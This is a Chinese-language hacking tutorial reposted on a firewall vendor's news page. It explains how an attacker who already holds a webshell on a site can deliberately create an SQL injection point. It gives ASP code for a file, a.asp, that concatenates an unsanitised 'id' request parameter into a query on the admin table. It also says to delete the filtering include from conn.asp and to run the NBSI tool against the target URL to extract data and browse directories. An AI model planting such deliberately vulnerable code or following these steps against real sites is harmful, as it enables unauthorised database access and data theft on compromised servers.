English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 业界动态 >> 在webshell基础上伪造SQL注入点

 

在webshell基础上伪造SQL注入点

威盾防火墙 2014-12-07

 
 有webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中。 

  在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如下: 

  <! --#include file="conn.asp" --> 

  <% 

  dim rs,strSQL,id 

  set rs=server.createobject("ADODB.recordset") 

  id = request("id") 

  strSQL = "select * from admin where id=" & id ’如果没有这个admin表,可以自己建立一个表和字段 

  rs.open strSQL,conn,1,3 

  rs.close 

  %>

   
  然后输入:http://目标IP/a.asp?id=1 

  完成了,就这么简单,其他的信息就让他全部自己暴露出来吧。打开nbsi,一顿狂注,什么信息都出来啦,慢慢的浏览着他的目录。

相关内容: 最新内容:
使用IDS技术防止SQL注入攻击[2014-12-07]
Web环境下SQL注入攻击的检测与防御[2014-12-07]
防护黑客必学招数 SQL注入拦截-MYIIS-VIF助你一臂之力[2014-12-07]
SQL Server 2000的安全配置[2014-12-06]
PHP+MYSQL注入实例与防范措施总结[2014-12-05]
10个SQL注入工具[2014-12-05]
从黑客角度谈谈个人安全防范的问题[2014-12-07]
使用IDS技术防止SQL注入攻击[2014-12-07]
Web环境下SQL注入攻击的检测与防御[2014-12-07]
[WEB黑客攻防] Resin 1.2 重要源代码暴露漏洞[2014-12-07]
如何使用MYIIS-VIF来限制和防采集功能 让你的站点少点负担[2014-12-07]
我来教你玩转MYIIS-VIF 防盗链 基础防盗链[2014-12-07]